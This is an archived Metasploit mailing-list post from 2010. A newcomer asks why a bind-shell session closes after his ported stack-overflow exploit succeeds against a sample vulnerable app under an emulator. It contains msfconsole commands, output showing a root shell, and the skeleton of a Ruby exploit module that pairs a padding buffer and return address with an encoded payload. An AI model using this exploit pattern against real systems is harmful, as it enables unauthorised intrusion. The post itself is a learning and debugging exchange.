Metasploit mailing list archives
Unsuccessful connection after successful exploit
From: Eloi Sanfèlix <eloi () limited-entropy com>
Date: Thu, 11 Feb 2010 20:16:05 +0100
Hi all, I'm quite new to Metasploit, and I've started by porting a little exploit for a sample vulnerable app I had on my hard disk. I also ported an execve payload and a bind shell payload just to see how the framework works. When I run the exploit with the execve shellcode everything is fine, I can see my shell pop in the attacked process under an emulator. However, when I run the bind shell payload something weird happens. At a first attempt, metasploit tries to connect to the new session, but fails and closes the session: msf exploit(stack) > set payload shell_bind_tcp msf exploit(stack) > set RHOST 127.0.0.1 RHOST => 127.0.0.1 msf exploit(stack) > set LPORT 1234 LPORT => 1234 msf exploit(stack) > exploit [*] Started bind handler [*] Command shell session 1 opened (127.0.0.1:39112 -> 127.0.0.1:1234) [*] Command shell session 1 closed. However, if I look at my emulated system, the exploit actually succeeded and it is executing a shell and listening for incoming connections on the selected port. Now, if I call exploit again, metasploit successfully connects to the shell created previously as you can see below: msf exploit(stack) > exploit [*] Started bind handler [*] Command shell session 2 opened (127.0.0.1:59482 -> 127.0.0.1:1234) /bin/id uid=0(root) gid=0(root) I tried to understand what is happening, but I fail to do so. In case it is useful, here is the basic structure of my exploit: def exploit connect repeat = target['Offset']/4 junk = "AAAA"*repeat sploit = junk + [target.ret].pack('V') +payload.encoded real_sploit = [sploit.length()].pack('V') + sploit sock.put(real_sploit) handler disconnect end Pretty simple as you can see. Also, the payload has the same structure as any other Bind TCP payload. Specifically, it defines the following handler and session options: 'Handler' => Msf::Handler::BindTcp, 'Session' => Msf::Sessions::CommandShell, Does anyone have an idea about why it could go wrong? Thanks in advance for your feedback Eloi PS: I also tried adding a little delay between sending the payload and calling handler, but it doesn't help.
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Unsuccessful connection after successful exploit Eloi Sanfèlix (Feb 11)
- Re: Unsuccessful connection after successful exploit HD Moore (Feb 11)
- Re: Unsuccessful connection after successful exploit Eloi Sanfèlix (Feb 11)
- Re: Unsuccessful connection after successful exploit Patrick Webster (Feb 11)
- Re: Unsuccessful connection after successful exploit Eloi Sanfèlix (Feb 11)
- Re: Unsuccessful connection after successful exploit HD Moore (Feb 11)